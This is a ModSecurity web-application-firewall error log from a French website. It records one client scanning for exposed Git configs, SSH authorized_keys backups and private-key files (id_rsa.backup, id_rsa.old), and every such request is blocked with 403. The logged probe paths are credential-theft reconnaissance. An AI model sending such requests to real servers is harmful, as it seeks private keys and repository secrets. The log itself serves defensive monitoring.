[Mon May 11 11:46:32.944991 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:52510] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /azure/.git/config4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/azure/.git/config4"] [unique_id "agGleEYQeUtAPynIs6xWOwAAAAU"]
[Mon May 11 11:46:32.955146 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:52510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/azure/.git/config4"] [unique_id "agGleEYQeUtAPynIs6xWOwAAAAU"]
[Mon May 11 11:46:36.456106 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:52510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGleEYQeUtAPynIs6xWOwAAAAU"]
[Mon May 11 11:46:54.505601 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:39256] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/docker/.ssh/authorized_keys.backup"] [unique_id "agGljkYQeUtAPynIs6xWUQAAABQ"]
[Mon May 11 11:46:54.506553 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:39256] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/docker/.ssh/authorized_keys.backup"] [unique_id "agGljkYQeUtAPynIs6xWUQAAABQ"]
[Mon May 11 11:46:55.929104 2026] [security2:error] [pid 1254212:tid 1254234] [client 185.177.72.9:39256] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGljkYQeUtAPynIs6xWUQAAABQ"]
[Mon May 11 11:46:55.954166 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:39266] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/docker/.ssh/authorized_keys.backup"] [unique_id "agGlj0YQeUtAPynIs6xWUgAAABU"]
[Mon May 11 11:46:55.955287 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:39266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/docker/.ssh/authorized_keys.backup"] [unique_id "agGlj0YQeUtAPynIs6xWUgAAABU"]
[Mon May 11 11:46:57.206391 2026] [security2:error] [pid 1254212:tid 1254235] [client 185.177.72.9:39266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlj0YQeUtAPynIs6xWUgAAABU"]
[Mon May 11 11:47:03.109230 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:39316] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/lib/.ssh/authorized_keys.backup"] [unique_id "agGll74KNmD_mZ_vlf829wAAAEA"]
[Mon May 11 11:47:03.109673 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:39316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/lib/.ssh/authorized_keys.backup"] [unique_id "agGll74KNmD_mZ_vlf829wAAAEA"]
[Mon May 11 11:47:04.308185 2026] [security2:error] [pid 1254242:tid 1254246] [client 185.177.72.9:39316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGll74KNmD_mZ_vlf829wAAAEA"]
[Mon May 11 11:47:04.329416 2026] [security2:error] [pid 1254179:tid 1254199] [client 185.177.72.9:14288] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/lib/.ssh/authorized_keys.backup"] [unique_id "agGlmGS6k_SCYd1AVZqsoAAAARI"]
[Mon May 11 11:47:04.329857 2026] [security2:error] [pid 1254179:tid 1254199] [client 185.177.72.9:14288] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/lib/.ssh/authorized_keys.backup"] [unique_id "agGlmGS6k_SCYd1AVZqsoAAAARI"]
[Mon May 11 11:47:05.767189 2026] [security2:error] [pid 1254179:tid 1254199] [client 185.177.72.9:14288] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlmGS6k_SCYd1AVZqsoAAAARI"]
[Mon May 11 11:47:08.259039 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:14316] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/mocha/ssh/id_rsa.backup"] [unique_id "agGlnGS6k_SCYd1AVZqsowAAAQs"]
[Mon May 11 11:47:08.260065 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:14316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/mocha/ssh/id_rsa.backup"] [unique_id "agGlnGS6k_SCYd1AVZqsowAAAQs"]
[Mon May 11 11:47:09.837634 2026] [security2:error] [pid 1254179:tid 1254192] [client 185.177.72.9:14316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlnGS6k_SCYd1AVZqsowAAAQs"]
[Mon May 11 11:47:09.860587 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:14326] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/mocha/ssh/id_rsa.backup"] [unique_id "agGlnWS6k_SCYd1AVZqspAAAAQ4"]
[Mon May 11 11:47:09.861350 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:14326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/mocha/ssh/id_rsa.backup"] [unique_id "agGlnWS6k_SCYd1AVZqspAAAAQ4"]
[Mon May 11 11:47:11.593119 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:14326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlnWS6k_SCYd1AVZqspAAAAQ4"]
[Mon May 11 11:47:11.618671 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:14328] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /models/.git/config.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/models/.git/config.local"] [unique_id "agGln5kIEwRJMyDaV55M4AAAAUo"]
[Mon May 11 11:47:11.619062 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:14328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/models/.git/config.local"] [unique_id "agGln5kIEwRJMyDaV55M4AAAAUo"]
[Mon May 11 11:47:12.822361 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:14328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGln5kIEwRJMyDaV55M4AAAAUo"]
[Mon May 11 11:47:12.850223 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:14338] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /models/.git/config.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/models/.git/config.local"] [unique_id "agGloL4KNmD_mZ_vlf83BAAAAEk"]
[Mon May 11 11:47:12.850620 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:14338] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/models/.git/config.local"] [unique_id "agGloL4KNmD_mZ_vlf83BAAAAEk"]
[Mon May 11 11:47:14.084227 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:14338] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGloL4KNmD_mZ_vlf83BAAAAEk"]
[Mon May 11 11:47:38.596335 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:54050] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /rpc/.git/config_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/rpc/.git/config_production"] [unique_id "agGlukYQeUtAPynIs6xWeAAAAAg"]
[Mon May 11 11:47:38.596813 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:54050] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/rpc/.git/config_production"] [unique_id "agGlukYQeUtAPynIs6xWeAAAAAg"]
[Mon May 11 11:47:38.728261 2026] [:error] [pid 1254242:tid 1254262] [client 85.208.96.211:25892] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 11:47:39.824204 2026] [security2:error] [pid 1254212:tid 1254222] [client 185.177.72.9:54050] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlukYQeUtAPynIs6xWeAAAAAg"]
[Mon May 11 11:47:39.850836 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:54064] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /rpc/.git/config_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/rpc/.git/config_production"] [unique_id "agGlu5kIEwRJMyDaV55M_wAAAUI"]
[Mon May 11 11:47:39.854579 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:54064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/rpc/.git/config_production"] [unique_id "agGlu5kIEwRJMyDaV55M_wAAAUI"]
[Mon May 11 11:47:41.072912 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:54064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGlu5kIEwRJMyDaV55M_wAAAUI"]
[Mon May 11 11:47:59.890803 2026] [security2:error] [pid 1254242:tid 1254254] [client 185.177.72.9:64990] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/templates/ssh/id_rsa.old"] [unique_id "agGlz74KNmD_mZ_vlf83VQAAAEk"]
